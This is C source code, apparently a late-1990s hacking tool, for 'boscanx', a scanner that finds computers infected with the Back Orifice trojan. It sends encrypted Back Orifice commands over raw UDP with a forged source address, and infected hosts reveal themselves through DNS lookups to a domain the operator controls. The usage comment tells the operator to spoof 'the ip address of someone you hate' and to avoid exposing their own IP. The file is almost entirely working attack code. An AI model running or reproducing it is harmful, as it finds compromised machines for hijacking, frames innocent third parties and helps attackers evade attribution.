boscanx.c is a fast back orifice scanner that accurately records infected ip addresses while spoofing it's source ip.
452ad5deb832c601076e6bd1e55e97e73bef0dd6fe6b2cf98d58295635009db0
char domain[] = ".your.domain.com"; /* change this to a domain you control */
char about[] =
"boscanx by Sorcerer of DALnet, spoofed back orifice scanner";
/*
HOW IT WORKS:
*see below*
HOW TO USE IT:
first set domain[] (above) to a domain controlled by the
computer that will be doing the scan. be sure to prefix it with a .
whether named is loaded or not is unimportant, boscanx will still log
and process the requests. if you need a domain, try a free dns provider.
just map authority over any domain onto your ip before you scan.
./boscanx [options] <start ip> <end ip>
-d <delay between transmission, in ticks (100 is normally 1 second)>
-D <dups, each query will be sent out this many times (default 1)>
-l <local (source) ip for all requests,
this should be the ip address of someone you hate>
-p <local (source) port, should be between 1024 and 5000>
./boscanx -d 2 -D 3 -l 1.2.3.4 -p 1056 24.0.0.0 24.255.255.255
will scan 24.*, sending to one ip every 2 clock ticks, sending 3 packets
to each ip, and spoofing as 1.2.3.4:1056
local ip and port will be randomized if unspecified
NOTE:
watch out for fake servers that will perform dns lookups,
you may want to issue some other spoofed commands to test
any servers that you find, before exposing your real ip.
NOTE TO IDIOTS:
Stop complaining about bo packets, you have no way of determining what's
spoofed and what isn't. Just remember that someone could spoof as you.
And of course, the dns domain could be fake too. Just get a life.
*/
#include <stdio.h>
#include <netinet/in.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/times.h>
#include <unistd.h>
#include <fcntl.h>
#define DOMAIN_LEN (sizeof(domain) - 1)
#define MAX_RECV 2048
int wait_read(int sock,int waittime) {
fd_set read_set;
struct timeval tv;
FD_ZERO(&read_set);
FD_SET(sock,&read_set);
tv.tv_sec=waittime / 1000;
tv.tv_usec=waittime - ((waittime / 1000) * 1000);
if(select(sock+1,&read_set,NULL,NULL,&tv)<1) return(0); else return(1);
}
struct ipudp_hdr {
unsigned char verihl;
unsigned char tos;
unsigned short ip_len;
unsigned short id;
unsigned short flg_ofs;
unsigned char ttl;
unsigned char proto;
unsigned short ip_sum;
unsigned long src;
unsigned long dst;
unsigned short sport;
unsigned short dport;
unsigned short udp_len;
unsigned short udp_sum;
};
struct bo_packet {
unsigned char verihl;
unsigned char tos;
unsigned short ip_len;
unsigned short id;
unsigned short flg_ofs;
unsigned char ttl;
unsigned char proto;
unsigned short ip_sum;
unsigned long src;
unsigned long dst;
unsigned short sport;
unsigned short dport;
unsigned short udp_len;
unsigned short udp_sum;
char bo_magic[8];
unsigned long bo_len,bo_seq;
unsigned char bo_type;
unsigned char bo_data[18 + DOMAIN_LEN];
};
#define BO_PACKETSZ (63 + DOMAIN_LEN)
void bo_crypt(char *targ,int len) {
int val = 31337,pos = -1;
while((pos+=1)<len) {
val = (val * 214013) + 2531011;
targ[pos] ^= ((val >> 16) & 0xff);
}
}
unsigned short pseudo_sum(struct bo_packet *buf) {
register int count = (ntohs(buf->ip_len)-20),
sum = (buf->src >> 16) + (buf->src & 0xFFFF) + (buf->dst >> 16) +
(buf->dst & 0xFFFF) + (buf->proto << 8) + htons(count);
register unsigned short *p = (unsigned short *)&buf->sport;
buf->udp_sum = 0;
while(count>1) {
sum += *p++;
count-=2;
}
if(count) sum += *p & 0xff;
sum = (sum >> 16) + (sum & 0xffff);
return(~(sum += (sum >> 16)));
}
int send_query(int socket,int _dup,int target,int dns_id,unsigned long local_ip,
unsigned short local_port) {
struct sockaddr_in targ;
struct bo_packet packet;
int dup = _dup;
targ.sin_addr.s_addr = target;
targ.sin_port = htons(31337);
targ.sin_family = AF_INET;
strncpy(packet.bo_magic,"*!*QWTY?",8);
packet.bo_len = BO_PACKETSZ - 28;
packet.bo_seq = random() | 0x10000001;
packet.bo_type = 0x16;
snprintf(packet.bo_data,sizeof(packet.bo_data),
"%08lx%08lx%s",dns_id,target,domain);
packet.bo_data[sizeof(packet.bo_data)-1] = 0;
packet.bo_data[sizeof(packet.bo_data)-2] = 0;
bo_crypt(packet.bo_magic,packet.bo_len);
packet.verihl = 69;
packet.tos = 0;
packet.ip_len = htons(BO_PACKETSZ);
packet.id = random()|1;
packet.flg_ofs = 0;
packet.ttl = 128;
packet.proto = 17;
packet.ip_sum = 0;
packet.src = local_ip;
packet.dst = target;
packet.sport = local_port;
packet.dport = htons(31337);
packet.udp_len = htons(BO_PACKETSZ - 20);
packet.udp_sum = pseudo_sum(&packet);
while(dup--)
if(sendto(socket,&packet,BO_PACKETSZ,0,
(struct sockaddr *)&targ,sizeof(targ))!=BO_PACKETSZ) return(0);
}
int bufpos(const char *s1,int s1_len,const char *s2,int s2_len) {
int spos=-1,cpos,s1len,s2len;
if((s1len=s1_len)<0) s1len=strlen(s1);
if((s2len=s2_len)<0) s2len=strlen(s2);
while((spos+=1)<s1len) {
cpos = 0;
while((cpos<s2len) && (spos+cpos<s1len)) {
if(s1[spos+cpos]!=s2[cpos]) break;
cpos++;
}
if(cpos==s2len) return(spos);
}
return(-1);
}
unsigned char hexchar_to_byte(const char c) {
if((c>96) && (c<103)) return(c-87);
else if((c>64) && (c<71)) return(c-55);
else if((c>47) && (c<58)) return(c-48);
else return(0);
}
int last_ip = 0;
void handle_hexip(const char *ip) {
unsigned long net_ip =
(hexchar_to_byte(ip[0]) << 28) |
(hexchar_to_byte(ip[1]) << 24) |
(hexchar_to_byte(ip[2]) << 20) |
(hexchar_to_byte(ip[3]) << 16) |
(hexchar_to_byte(ip[4]) << 12) |
(hexchar_to_byte(ip[5]) << 8) |
(hexchar_to_byte(ip[6]) << 4) |
hexchar_to_byte(ip[7]);
if(net_ip!=last_ip) {
last_ip = net_ip;
fprintf(stdout,"%s\n",inet_ntoa(net_ip));
}
}
void recv_packet(int sock,int dns_id,unsigned long ip_src,
unsigned short udp_sport) {
int res,id_ofs;
char buffer[MAX_RECV],str_id[9];
struct ipudp_hdr *hdr = (struct ipudp_hdr *)buffer;
struct sockaddr_in src;
int src_len = sizeof(struct sockaddr_in);
if(((hdr->src==ip_src) && (hdr->sport==udp_sport))
|| (hdr->dport==htons(31337))) return;
snprintf(str_id,sizeof(str_id),"%08lx",dns_id);
while((res=recvfrom(sock,buffer,sizeof(buffer),0,
(struct sockaddr *)&src,&src_len))>16) {
if((id_ofs=bufpos(buffer,res,str_id,-1))>-1)
if(id_ofs<res-15) handle_hexip(&buffer[id_ofs+8]);
}
}
int main(int argc,char *argv[]) {
int sock,one=1,dns_id;
struct sockaddr_in host;
int argn=-1,delay=100,read_wait,dup=1;
unsigned long lastsend;
unsigned long start_ip=0,current_ip=0,end_ip=0,local_ip;
unsigned short local_port;
int fcntl_res;
fprintf(stderr,"%s\n",about);
srandom(time(NULL));
if((sock=socket(AF_INET,SOCK_RAW,17))<0) {
fprintf(stderr,"failed to create socket\n");
exit(1);
}
if(setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&one,sizeof(one))<0) {
fprintf(stderr,"failed to enable IP_HDRINCL on socket\n");
exit(2);
}
if((fcntl_res=fcntl(sock,F_GETFL,0))==-1) {
fprintf(stderr,"failed to get socket flags\n");
exit(3);
}
if(fcntl(sock,F_SETFL,fcntl_res|O_NONBLOCK)==-1) {
fprintf(stderr,"failed to set socket flags\n");
exit(4);
}
host.sin_addr.s_addr = 0;
host.sin_port = 53;
host.sin_family = AF_INET;
if(bind(sock,(struct sockaddr *)&host,sizeof(struct sockaddr_in))) {
fprintf(stderr,"failed to bind() socket\n");
exit(5);
}
if(!(argc&1)) {
fprintf(stderr,"invalid command line arguments, please see source comments\n");
exit(6);
}
local_ip = htonl(random() | 0x80000001);
local_port = htons(1024 + (random() & 2048));
while((argn+=2)<argc) {
if (argv[argn][0]!='-') break;
switch(argv[argn][1]) {
case 'd':
if(argn>argc-2) break;
delay = atoi(argv[argn+1]);
break;
case 'l':
if(argn>argc-2) break;
local_ip = inet_addr(argv[argn+1]);
break;
case 'p':
if(argn>argc-2) break;
local_port = htons(atoi(argv[argn+1]));
break;
case 'D':
if(argn>argc-2) break;
dup = atoi(argv[argn+1]);
break;
default:
fprintf(stderr,"unknown switch: %c\n",argv[argn][1]);
exit(7);
}
}
if(argn+2>argc) {
fprintf(stderr,"must specify target ip, see source comments for more details\n");
exit(8);
}
start_ip = current_ip = ntohl(inet_addr(argv[argn])) - 1;
end_ip = ntohl(inet_addr(argv[argn+1])) + 1;
host.sin_addr.s_addr = inet_addr(argv[argn]);
host.sin_port = htons(31337);
host.sin_family = AF_INET;
dns_id = random();
while((current_ip+=1)!=end_ip) {
if(!send_query(sock,dup,htonl(current_ip),dns_id,local_ip,local_port)) exit(9);
lastsend = times(NULL);
do{
if((read_wait=delay-(times(NULL)-lastsend))<0) read_wait = 0;
if(wait_read(sock,read_wait*10)) recv_packet(sock,dns_id,local_ip,local_port);
} while(read_wait>0);
}
read_wait = 500;
lastsend = times(NULL);
while(wait_read(sock,read_wait*10)) {
read_wait = 500 - (times(NULL) - lastsend);
recv_packet(sock,dns_id,local_ip,local_port);
}
exit(0);
}